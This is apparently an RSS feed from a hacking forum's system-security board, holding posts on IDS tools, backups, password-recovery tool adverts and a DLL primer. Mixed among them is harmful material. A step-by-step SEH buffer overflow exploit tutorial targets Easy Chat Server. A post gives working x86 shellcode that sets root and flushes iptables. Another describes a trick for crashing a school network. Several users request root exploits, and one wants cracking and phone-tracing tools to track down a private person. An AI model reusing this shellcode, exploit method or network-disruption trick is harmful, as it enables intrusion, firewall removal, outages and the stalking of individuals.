<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
      <title>System Security - iExploit</title>
      <link>http://iexploit.org/index.php?p=/categories/system-security/feed.rss</link>
      <pubDate>Sun, 19 May 13 21:04:45 -0400</pubDate>
         <description>System Security - iExploit</description>
   <language>en-CA</language>
   <atom:link href="/index.php?p=/discussions/feed.rss" rel="self" type="application/rss+xml" />
   <item>
      <title>Bluetooth brut force</title>
      <link>http://iexploit.org/index.php?p=/discussion/6262/bluetooth-brut-force</link>
      <pubDate>Sun, 17 Feb 2013 10:52:52 -0500</pubDate>
      <dc:creator>Clay7355</dc:creator>
      <guid isPermaLink="false">6262@/index.php?p=/discussions</guid>
      <description><![CDATA[Is there a app that I can install on my iPhone 4S iOS 6.0.1 that uses OpenSSh to login into other device that can mirror the screen of the device on to my iPhone 4s]]></description>
   </item>
   <item>
      <title>Favourite Linux IDS?</title>
      <link>http://iexploit.org/index.php?p=/discussion/2313/favourite-linux-ids</link>
      <pubDate>Tue, 22 Feb 2011 23:05:31 -0500</pubDate>
      <dc:creator>Xin</dc:creator>
      <guid isPermaLink="false">2313@/index.php?p=/discussions</guid>
      <description><![CDATA[Ive used quite a few and i have to say my favourite is the CLI snort, although im thinking of trying out the webbased version of it.]]></description>
   </item>
   <item>
      <title>Some fairly good Buffer Overflow Tuts i stumbled upon</title>
      <link>http://iexploit.org/index.php?p=/discussion/6244/some-fairly-good-buffer-overflow-tuts-i-stumbled-upon</link>
      <pubDate>Sat, 12 Jan 2013 06:28:38 -0500</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6244@/index.php?p=/discussions</guid>
      <description><![CDATA[<span style="font-family: Arial, Verdana; font-size: small;">Part 1)&nbsp;<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/pB7d3ZAXkOo&amp;hl=en_US&amp;fs=1&amp;"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/pB7d3ZAXkOo&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" width="640" height="385"></object></span><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">Part 2)&nbsp;<div class="Video"><object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/QP6O2nYaOQo&amp;hl=en_US&amp;fs=1&amp;"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/QP6O2nYaOQo&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" width="640" height="385"></object></div></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">Part 3)&nbsp;<div class="Video"><object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/6TsEB7qKJzA&amp;hl=en_US&amp;fs=1&amp;"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/6TsEB7qKJzA&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" width="640" height="385"></object></div></div><div style="font-family: Arial, Verdana; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><br></div><div><span style="font-family: Arial, Verdana; font-size: small;">Part 4)&nbsp;<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/JdVRqMQLPCU&amp;hl=en_US&amp;fs=1&amp;"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/JdVRqMQLPCU&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" width="640" height="385"></object></span></div><br><br><br><span style="font-family: Arial, Verdana; font-size: small;">Cam&nbsp;across&nbsp;these whilst browsing google, they are helping me and so maybe they can help someone else as well.</span>]]></description>
   </item>
   <item>
      <title>Hack tools for linux</title>
      <link>http://iexploit.org/index.php?p=/discussion/6196/hack-tools-for-linux</link>
      <pubDate>Wed, 03 Oct 2012 13:29:37 -0400</pubDate>
      <dc:creator>Last_Gunslinger</dc:creator>
      <guid isPermaLink="false">6196@/index.php?p=/discussions</guid>
      <description><![CDATA[Hello, im doing some private work for a friend, someone is spreading lies and <br>roomers about her, she sent me a pic of her in a thong that people were <br>sending&nbsp; around and start talking alot of trash. She hired me to track <br>him down, and this alot more then im actually used to doing (im a <br>network security professional), and i need a list of programs comptible <br>with linux in these categories, command line or GUI not picky.<br>Password dictionary creater tools<br>windows os crashing software or something similar<br>phone tracing software<br>picture<br> reading or backtracing software (main intent is to read the fingerprint<br> and find which phone or computer it was orginally edited or taken from)<br>password crackers (http and https mainly)<br>a list of port scanner besides NMAP or angryip<br>email, and text reading sofware or client<br>and HDD crashers (not entirely needed but might be)<br>If this is banned or offensive in anyway feel free to say no to any or all programs listed above.<br>-Last_Gunsliner<br>]]></description>
   </item>
   <item>
      <title>What is your method for Backups?</title>
      <link>http://iexploit.org/index.php?p=/discussion/6002/what-is-your-method-for-backups</link>
      <pubDate>Fri, 13 Apr 2012 05:18:52 -0400</pubDate>
      <dc:creator>Xin</dc:creator>
      <guid isPermaLink="false">6002@/index.php?p=/discussions</guid>
      <description><![CDATA[What do you back it up onto and on how many different devices?<br><br>Also do you guys use cloud or not?<br><br><br>]]></description>
   </item>
   <item>
      <title>How to Crash Some School Networks</title>
      <link>http://iexploit.org/index.php?p=/discussion/105/how-to-crash-some-school-networks</link>
      <pubDate>Sun, 14 Mar 2010 01:13:49 -0500</pubDate>
      <dc:creator>Xin</dc:creator>
      <guid isPermaLink="false">105@/index.php?p=/discussions</guid>
      <description><![CDATA[Heres a little trick thats very effective on taking down the WHOLE School Network. Found it out on my School Network.<br /><br />Works only on Ethernet connection networks.<br />Find two PCs next to each other plugged into the Ethernet wall socket, <br />Take the ethernet cable out of one pc and plug it into the other so there is two cables plugged into the same pc. This confuses the hell out of the network and Shuts it down. This took down ALL the computers around the school and ALL the security cameras. It cant be fixed until they find the pc with 2 plugs in and take them out and reboot the network. <br /><br />Enjoy :D]]></description>
   </item>
   <item>
      <title>Few question, can anyone help?</title>
      <link>http://iexploit.org/index.php?p=/discussion/6129/few-question-can-anyone-help</link>
      <pubDate>Sat, 25 Aug 2012 14:09:48 -0400</pubDate>
      <dc:creator>Mr. P-teo</dc:creator>
      <guid isPermaLink="false">6129@/index.php?p=/discussions</guid>
      <description><![CDATA[So iv been looking into system hacking, more specifically the ability to identify vulnerabilities in operating systems and exploit them to gain access(eventually get root). This is a topic that doesn't seem to have alot of tutorials, guides or help so i was wondering...<br><br><b>1)</b> Im on linux mint, what tool can i use to identify vulnerabilities, i know i can use nmap and see if i can exploit any running processes but what else.<br><br><b>2)</b> is there anywhere i can get more information on this OS hacking, or do i just have to keep poking around forums and asking odd questions?<br><br>]]></description>
   </item>
   <item>
      <title>SEH based buffer overflow tutorial - Exploiting Easy Chat Server</title>
      <link>http://iexploit.org/index.php?p=/discussion/5956/seh-based-buffer-overflow-tutorial-exploiting-easy-chat-server</link>
      <pubDate>Sun, 19 Feb 2012 03:43:47 -0500</pubDate>
      <dc:creator>undead</dc:creator>
      <guid isPermaLink="false">5956@/index.php?p=/discussions</guid>
      <description><![CDATA[In this tutorial I will exploit a vulnerable program called Easy Chat Server in order to demonstrate how to create a SEH based BoF exploit.<br><br>As you can see at exploit-db <a class="postlink" rel="nofollow" href="http://www.exploit-db.com/exploits/8142/">http://www.exploit-db.com/exploits/8142/</a> Easy Chat Server has username and password parameters vulnerable to buffer overflow.<br><br>We can exploit this buffer overflow vulnerability via a GET HTTP request by giving our payload as input for the username parameter instead of giving a normal username. Password parameter doesn't matter.<br>Now it's time to create a program which will exploit this vulnerability.<br>Let's see what happens if we pass 1000 A's to the username parameter<br>http&#58;//i&#46;imgur&#46;com/iNulm&#46;png<br><br>http&#58;//i&#46;imgur&#46;com/wGffY&#46;png<br><br>http&#58;//i&#46;imgur&#46;com/arTbN&#46;png<br><br>We get the message "Access violation when reading [41414141] - ..." and if you press Alt + s you will notice that we've corrupted the SEH chain and it has been overwriten with 41414141 (A's in hex).<br><br>The next step is to follow this address in the stack (right click and select this option) and now we should figure out the offset of the pointer to next SEH record and the exception handler.<br>To do this I will use pattern_create and pattern_offset tools provided by metasploit.<br><br><div class="PreContainer"><pre>root@root&amp;#58;~# /pentest/exploits/framework/tools/pattern_create&amp;#46;rb 1000</pre></div><br><br>and now we need to replace the 1000 A's with the 1000 character string created by pattern_create tool<br>http&#58;//i&#46;imgur&#46;com/MOqVN&#46;png<br><br>and now let's run the python program again.<br><br>http&#58;//i&#46;imgur&#46;com/sefvA&#46;png<br><br>By using the pattern_offset tool we can figure out the offset to the pointer to next seh record, the offset of exception handler will be the previous offset + 4<br><br><div class="PreContainer"><pre>root@root&amp;#58;/pentest/exploits/framework/tools# &amp;#46;/pattern_offset&amp;#46;rb Ah2A<br>216<br>root@root&amp;#58;/pentest/exploits/framework/tools# &amp;#46;/pattern_offset&amp;#46;rb h3Ah<br>220</pre></div><br>as expected<br><br>By knowing where pointer to next seh record and seh is we can overwrite them with whatever we want.<br>Let's update our python code and do this<br>http&#58;//i&#46;imgur&#46;com/baLyg&#46;png<br>and there we go <br>http&#58;//i&#46;imgur&#46;com/ej4zM&#46;png<br><br>Now we want to execute our shellcode on the remote system but how are we going to accomplish this?<br><br>First we will overwrite the pointer to next seh record with a short JMP for 6 bytes (\xeb\x06\x90\x90)<br>so we will jump over the exception handler and land to our payload<br>eb is the opcode for jmp and 90 is for nop as you already know :)<br>why 6 bytes? \xeb\x06 occupies 2 bytes, the next two bytes are nops and the next four bytes are the pointer to the exception handler. So 2 + 4 = 6 bytes.<br><br>The next thing to do is overwrite to pointer to exception handler so it will point to a pop/pop/ret sequence.<br>To find a pop/pop/ret sequence we must search in a module without safeseh.<br><br>To find modules that aren't safeseh protected I'm going to use pvefindaddr by c0relanc0d3r.<br><br>http&#58;//i&#46;imgur&#46;com/HarXZ&#46;png<br><br><br><br>press alt+e and double click on that module.<br>Now right click and Search for... Sequence of commands and now search for an address that does not contain a null byte by pressing control+L<br><br>http&#58;//i&#46;imgur&#46;com/9zG9k&#46;png<br><br>or you can easily use pvefindaddr like this: !pvefindaddr p SSLEAY32. Then search for a suitable address in the output file.<br><br>To finish the exploit replace CCCC with the address of pop/pop/ret sequence and then add your shellcode to buffer variable.<br><br>Run the exploit and the shellcode should be executed.]]></description>
   </item>
   <item>
      <title>Linux Screenshots</title>
      <link>http://iexploit.org/index.php?p=/discussion/1494/linux-screenshots</link>
      <pubDate>Mon, 25 Oct 2010 20:10:19 -0400</pubDate>
      <dc:creator>Bursihido</dc:creator>
      <guid isPermaLink="false">1494@/index.php?p=/discussions</guid>
      <description><![CDATA[http&#58;//i&#46;imgur&#46;com/StNsL&#46;png<br>Arch linux + Awesome Wm <br><br>Post your own linux screenshot]]></description>
   </item>
   <item>
      <title>Bypass Windows XP Password on a DELL Laptop</title>
      <link>http://iexploit.org/index.php?p=/discussion/6127/bypass-windows-xp-password-on-a-dell-laptop</link>
      <pubDate>Mon, 20 Aug 2012 05:41:00 -0400</pubDate>
      <dc:creator>cheeryking</dc:creator>
      <guid isPermaLink="false">6127@/index.php?p=/discussions</guid>
      <description><![CDATA[<div><div style="font-weight: normal;"><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><span style="color: #999999;">Question: I have a DELL Laptop with windows XP and have forgotten my password. F8 restart isn't working. I tried what someone else had recommended for another person who had DELL with Windows XP but this restart with f8 function isn't doing anything.</span></span></span></div><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><span style="color: #999999;"><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><br><br>Following are 4 answers to this question. The strengths and weaknesses of each answer are also listed for your reference. Pick up one of these tips based on your case. Need to</span>&nbsp;<span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><b>bypass xp password</b></span><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;">? you can!<br><br><br>Answer 1. Reinstall Windows<br><br>If you have nothing important on the computer or don’t mind losing data, it’s an effective option. But I think this should be the last solution for most PC users to get</span>&nbsp;<span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><b>windows xp password bypass</b></span><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;">.<br><br>Strengths: Allow you to access the computer gain.<br><br>Weaknesses: Windows setup CD is required and computer data will be erased.<br><br><br>Answer 2. Apply a free software called Ophcrack.<br><br>It is free open source program that can</span>&nbsp;<span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><b>bypass Windows xp password</b></span>&nbsp;<span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;">by using LM hashes through rainbow tables.<br><br>Strengths: It is a free software and can be downloaded on the Internet<br><br>Weaknesses: If you are a newbie, it’s not recommended as it requires some computer skills and the password recovery rate is not guaranteed.<br><br><br>Answer 3. Use Windows Password Recovery Tool<br><br>Windows Password Recovery Tool is an easy-to-use tool designed for resetting Windows local account or domain passwords on any Windows system. Passwords can be reset in 3 minutes, no matter how long and complicated the password is. Besides password recovery function, it even can change any local admin/user/domain admin password, and create a new Administrator account via CD/DVD or USB drive.<br><br>Strengths: Easy (3 steps: Download – Burn - Reset); Fast (Only 3 minutes even less); Safe (Read-only and non-destructive design, no any data loss or damage)<br><br>Weaknesses: Shareware ($ 17.95 for Standard edition and $29.95 for Professional edition )<br><br><br>Answer 4: Take your laptop to a computer repair shop.<br><br>By this way, you have no need to learn</span>&nbsp;<span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><b>how to bypass windows xp password</b></span><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;">, as you just have it done by computer expert.<br><br>Strengths: Convenient<br><br>Weaknesses: Expensive<br><br><br>Are you satisfied with these answers? If you have more useful way to bypass XP password, please feel free to share with us.</span></span></span><br></div><br><br>]]></description>
   </item>
   <item>
      <title>How to crack laptop password without a password reset disk?</title>
      <link>http://iexploit.org/index.php?p=/discussion/6126/how-to-crack-laptop-password-without-a-password-reset-disk</link>
      <pubDate>Mon, 20 Aug 2012 05:39:44 -0400</pubDate>
      <dc:creator>cheeryking</dc:creator>
      <guid isPermaLink="false">6126@/index.php?p=/discussions</guid>
      <description><![CDATA[<div><div style="font-size: 15px; text-align: justify;"><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><span style="font-family: Calibri; color: #999999;">Recently I bought a DELL computer. It runs on Windows XP., I added a strong password to my pc so as to protect my files stored on it from being viewed by others. It may be too strong and I cannot remember what the password is now.</span></span></div><div style="font-size: 15px; text-align: justify;"><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><span style="font-family: Calibri; color: #999999;">What is worse, I failed to find the password reset disk I once created. And there’s only one user account on the pc.</span></span></div><div style="font-size: 15px; text-align: justify;"><span style="border-collapse: separate; font-family: Tahoma; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"><span style="font-family: Calibri; color: #999999;">I know I can reinstall Windows. But I am afraid of losing my important files. So this begs the question: If you lost Windows password without a password reset disk,<span>&nbsp;</span><b>how to crack a password on a laptop</b>&nbsp;without losing anything?</span></span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;"><br></span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;">A friend of mine intended me that I have two options. First, I can download a free Windows password cracker called Ophcrack. It is a free open source (GPL licensed) program that cracks windows password by using LM hashes through rainbow table. But it’s somewhat too difficult for me. What is more, It is time cosuming to crack laptop password with it. At the least, I just think so.</span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;"><br></span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;">Second, try using Windows Password Recovery Tool instead. He told me that this app is easier and more efficient if I need to crack laptop password and avoid losing data.</span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;"><br></span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;">As a newbie, I opt for this software, though it costs me a few dollars. I don’t mind using a paid tool if this tool can really fix my trouble. I downloaded and installed Windows Password Recovery Tool in my brother’s computer. Then I was able to create a bootable password reset CD in seconds. After this, I started my computer from the disk and I can access Windows Password Recovery Tool . Next I easily reset the forgotten password to blank by following the instructions. And now I can log into my computer again.</span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;"><br></span></div><div style="font-size: 15px; text-align: justify;"><span style="font-family: Calibri; color: #999999;">By using this software, I cracked my laptop password successfully. No any computer skill required and 100% security is also guaranteed. Need to&nbsp;<b>crack laptop password</b>? Just have a try of this tool.</span></div></div><br><br>]]></description>
   </item>
   <item>
      <title>How to Recover Lost Password for Windows Vista?</title>
      <link>http://iexploit.org/index.php?p=/discussion/6041/how-to-recover-lost-password-for-windows-vista</link>
      <pubDate>Tue, 29 May 2012 00:07:25 -0400</pubDate>
      <dc:creator>Lnicole</dc:creator>
      <guid isPermaLink="false">6041@/index.php?p=/discussions</guid>
      <description><![CDATA[<p><strong>It would be more complicated to deal with the problem  when</strong> <a rel="nofollow" href="http://www.windowspasswordsrecovery.com/"><strong>lost Windows Vista  password</strong></a><strong>.</strong><br><br>Many  people use passwords to protect access to computers. It is a <br>simple yet  effective way to protect sensitive data and equipment. <br>Unfortunately, by their  very nature, passwords can be easy to be lost <br>or forgotten. This can be an  especially difficult problem when the <br>forgotten password is for Windows Vista.  This is because a lot of <br>different functions available on XP are not available  on Vista. </p><br><p><strong>An administrator password cannot be changed without  knowing the original password on Vista.</strong><br><br>  In  Windows XP, one can change an administrator password even without <br>knowing its  original password. Do you know how? It’s pretty easy. The <br>first step is to  right click “My Computer”. Then in its options, choose<br> “Manage” → “Local Users and Groups” → “Users”.  Click the targeted <br>account and “Set Password” for it without tying its original  password. <br>However, if you forgot or lost an administrator password on Vista,  you <br>cannot solve the problem in this way unless you can remember the <br>original  password. Then, any other chances to recover the lost Vista <br>password?</p><br><p><strong>Best  way to </strong><a rel="nofollow" href="http://www.windowspasswordsrecovery.com/"><strong>crack Vista password</strong></a><strong>—to use a password recovery software  program.</strong><br><br>  If you do not mind losing data on your  Vista machine, then <br>reinstalling your machine could be a solution. But I don’t  recommend <br>people using this way to rescue a locked computer sine lots of time  and<br> data will be lost. Then, to use a password recovery software program, <br>in my  opinion sometimes could be the best or even the only way to <br>recover Vista  password. What is the password recovery software program?<br> Here I would suggest Windows  Password Recovery Tool Standard. </p><br><p><strong>How  to use Windows Password Recovery Tool Standard to reset lost Vista password?</strong><br><br>  Step1: Download and install Windows Password Recovery Tool Standard on a working PC.<br><br>  Step2: Burn CD/DVD with the program.<br><br>  Step3: Set the target computer boot from  CD/DVD.<br><br>  Step4: Reset the forgotten Vista password  with the burned CD/DVD. Then log on to your Vista pc without a password.</p><br><p>Above are the easy steps on how Windows  Password Recovery Tool <br>works. If you don’t have an extra CD or DVD, you can  also use a USB <br>flash drive to replace it but at this time you need to use  another <br>version of this tool—Windows Password Recovery Tool Professional. This  <br>version has more functions than the Standard one, if you are in need of <br>Windows  Vista password reset for your <strong>lost Vista admin password</strong>, and  interested in this tool, you can get more information by Google search “Windows  Password Recovery Tool 3.0”.</p><br><p>&nbsp;</p><br><p>Source: <a href="http://www.blog.windowspasswordsrecovery.com/lost-vista-password.htm" target="_blank" rel="nofollow">http://www.blog.windowspasswordsrecovery.com/lost-vista-password.htm</a></p><br><p>&nbsp;</p>]]></description>
   </item>
   <item>
      <title>setreuid(0,0) -&gt; execve(/sbin/iptables, -F, NULL) -&gt; exit(0) - [76bytes]</title>
      <link>http://iexploit.org/index.php?p=/discussion/6000/setreuid00-execvesbiniptables-f-null-exit0-76bytes</link>
      <pubDate>Thu, 12 Apr 2012 17:31:27 -0400</pubDate>
      <dc:creator>Sh3llc0d3</dc:creator>
      <guid isPermaLink="false">6000@/index.php?p=/discussions</guid>
      <description><![CDATA[Just thought i'd add some of the code i've been submitting etc.<br><br><pre>/* <br> *	Author: Sh3llc0d3<br> *	Environment: Linux/x86<br> *	Developed from: GNU ASM (AT&amp;T Syntax)<br> *	Purpose: [setreuid()] -&gt; [/sbin/iptables -F] -&gt; [exit(0)]<br> *	Size: 76 bytes<br> *<br> */<br>char code[] =	"\xeb\x33\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x5e\x31\xc0\x88\x46"<br>		"\x0e\x88\x46\x11\x89\x76\x12\x8d\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0"<br>		"\x0b\x89\xf3\x8d\x4e\x12\x8d\x56\x1a\xcd\x80\x31\xc0\xb0\x01\x31\xdb"<br>		"\xcd\x80\xe8\xc8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61"<br>		"\x62\x6c\x65\x73\x23\x2d\x46\x23";<br><br>int main(int argc, char **argv)<br>{<br>	int (*func)();<br>	func = (int (*)()) code;<br>	(int)(*func)();<br>}<br></pre>]]></description>
   </item>
   <item>
      <title>HOW TO LOCATE A VM ENVIRONMENT</title>
      <link>http://iexploit.org/index.php?p=/discussion/5993/how-to-locate-a-vm-environment</link>
      <pubDate>Wed, 04 Apr 2012 23:41:30 -0400</pubDate>
      <dc:creator>McKittrick</dc:creator>
      <guid isPermaLink="false">5993@/index.php?p=/discussions</guid>
      <description><![CDATA[i recently read a great book that tapped into this subject briefly. the idea and the tool used are from an amazing researcher named Joanna Rutkowska. the tool she wrote is called Red Pill. it is really a rootkit (and one of the most advanced ones out there).<br /><br /> the idea behind what she did was based on the fact that every operating system has an IDT (Interrupt Descriptor Table). this is a place that stores all interrupt address ranges. it it usually found in the first 100 bytes on a standard hard drive. what she found is that, when in a VM environment, this table is moved up further in memory since there is a virtual disk being used by the VM. the Red Pill tool calls upon the register IDTR to locate where the IDT is located. if it is found in the first few bytes, you are seeing the main OS environment, if further up, then we know a VM is being used. i found that quite amazing. i am assuming this can also be done on a remote level as well, maybe with a Meterpreter session being used to extract data like how a null session does in Windows or also using WMI APIs<br /><br />the book in reference to what i just wrote is "Counter Hack Reloaded". the article mentions that from what the author knows, as of now, there is still no way to "jump" outside of a VM environment into the main OS one. does anyone know of this happening yet?]]></description>
   </item>
   <item>
      <title>Help needed .</title>
      <link>http://iexploit.org/index.php?p=/discussion/5978/help-needed-</link>
      <pubDate>Fri, 16 Mar 2012 22:09:00 -0400</pubDate>
      <dc:creator>Hardcore-Gabber</dc:creator>
      <guid isPermaLink="false">5978@/index.php?p=/discussions</guid>
      <description><![CDATA[Please help me how to use this exploits to work properly ??<br><br><a class="postlink" rel="nofollow" href="http://pastie.org/private/feg8du0e9kfagng4rrg">http://pastie.org/private/feg8du0e9kfagng4rrg</a><br><a class="postlink" rel="nofollow" href="http://pastebin.com/UzDKcCQy">http://pastebin.com/UzDKcCQy</a><br><br>Thanks]]></description>
   </item>
   <item>
      <title>Ftp exploit ?</title>
      <link>http://iexploit.org/index.php?p=/discussion/5981/ftp-exploit-</link>
      <pubDate>Sun, 18 Mar 2012 01:22:20 -0400</pubDate>
      <dc:creator>Hardcore-Gabber</dc:creator>
      <guid isPermaLink="false">5981@/index.php?p=/discussions</guid>
      <description><![CDATA[Please help me .. i have readed the whole page but cannot understand how to use this exploit ..<br><br><a class="postlink" rel="nofollow" href="http://www.exploit-db.com/exploits/15215/">http://www.exploit-db.com/exploits/15215/</a>]]></description>
   </item>
   <item>
      <title>Local root</title>
      <link>http://iexploit.org/index.php?p=/discussion/5970/local-root</link>
      <pubDate>Tue, 06 Mar 2012 12:45:44 -0500</pubDate>
      <dc:creator>Hardcore-Gabber</dc:creator>
      <guid isPermaLink="false">5970@/index.php?p=/discussions</guid>
      <description><![CDATA[Please someone cane give me a working local root exploit for this kernel .. have tried some of the public exploits that have founde on forums and google but no luck ..<br /><br />Apache/2.2.3 (CentOS). PHP/4.4.9<br />Kernel: Linux 2.6.18-128.2.1.el5PAE <a href="/index.php?p=/search&amp;Search=%231&amp;Mode=like">#1</a> SMP Tue Jul 14<br />07:15:01 EDT 2009 i686]]></description>
   </item>
   <item>
      <title>DLLs</title>
      <link>http://iexploit.org/index.php?p=/discussion/5979/dlls</link>
      <pubDate>Sat, 17 Mar 2012 00:32:09 -0400</pubDate>
      <dc:creator>chroniccommand</dc:creator>
      <guid isPermaLink="false">5979@/index.php?p=/discussions</guid>
      <description><![CDATA[[align=center]   [Paper: DLLs]<br>   [Author: Chroniccommand]<br>   [E-Mail: <a rel="nofollow" href="mailto:chroniccommand@gmail.com">chroniccommand@gmail.com</a>]<br>[iExploit]<br>[/align]<br><br>[<b>Introduction</b>]<br>Well, I'm back(I guess). I've been away for quite some time and I haven't really been in the security game lately, but I've decided to write a brief paper to get me started. This article is simply about DLLs in Windows. I'll start by explaining the basics of DLLs, how they work etc. I'll get into DLL hijacking and injecting near the end and provide some links to learn more about them.<br>------------------------------------------------<br><br>[<b>DLLs</b>]<br>The first thing you're going to know for DLL injecting/hijacking is what a DLL is. DLL stands for <b>Dynamic Link Library</b>. Basically a DLL is a shared library using <b>Portable Executable</b>(PE) file format. A DLL works sort of like an EXE, but cannot be executed if it is not linked to an executable program. The advantage to this is DLLs won't take up RAM while the program is running. Once the program needs something that is in the DLL, it runs it. If the code isn't needed, it isn't used. If the DLL needs to be updated at all, it will not need to be re-linked to the executable that uses it. Additionally, a DLL will run within the same space as the linked executable with similar permissions(unless otherwise granted). <br>DLLs are loaded either during load time or run time. During load time the program will call the DLL using a header file and a lib file. DLLs are generally created in C++ now a days, but can be created by a number of other programming languages.<br>If you look in a folder for some programs, you should notice some DLLs within the same folder. <br>Example:<br>http&#58;//desmond&#46;imageshack&#46;us/Himg138/scaled&#46;php?server=138&amp;filename=dll1&#46;png&amp;res=medium<br>The image is from a program known as Dolphin(Gamecube/Nintendo Wii emulator).<br>Those DLLs will either be called at run or load time by dolphin to preform different tasks.<br><br>A program called resource hacker can actually analyze DLLs and EXEs for you and display some information about them. As an example I chose explorer.exe(Windows Explorer) located in<br><div class="PreContainer"><pre>C&amp;#58;\Windows\</pre></div><br>Explorer has many things you can view in resource hacker such as bitmaps for icons that are used:<br>http&#58;//img14&#46;imageshack&#46;us/img14/333/dll2&#46;png<br>That is obviously the start icon, which can also be changed and customized to your liking with resource hacker.<br>Another example, the executable information viewed within resource hacker:<br>http&#58;//img14&#46;imageshack&#46;us/img14/7509/dll3&#46;png<br>-----------------------------------------------------<br><br>[<b>DLL hijacking</b>]<br>DLL hijacking is something I won't go to in depth with, and I will leave you some good links to read up on it. But basically, DLL hijacking is the act of replacing an original DLL with a malicious DLL in the same working directory. When the linked executable runs the DLL it will run the attackers malicious code. When this exploit was discovered tons of zero days were unearthed in many major programs including Adobe reader and iTunes. <br>Links to read up on DLL hijacking:<br>Metasploit: Exploiting DLL hijacking flaws<br>Exploiting dll hijack in real world<br>DLL hijacking vulnerabilities<br>----------------------------------------------------<br>[<b>DLL 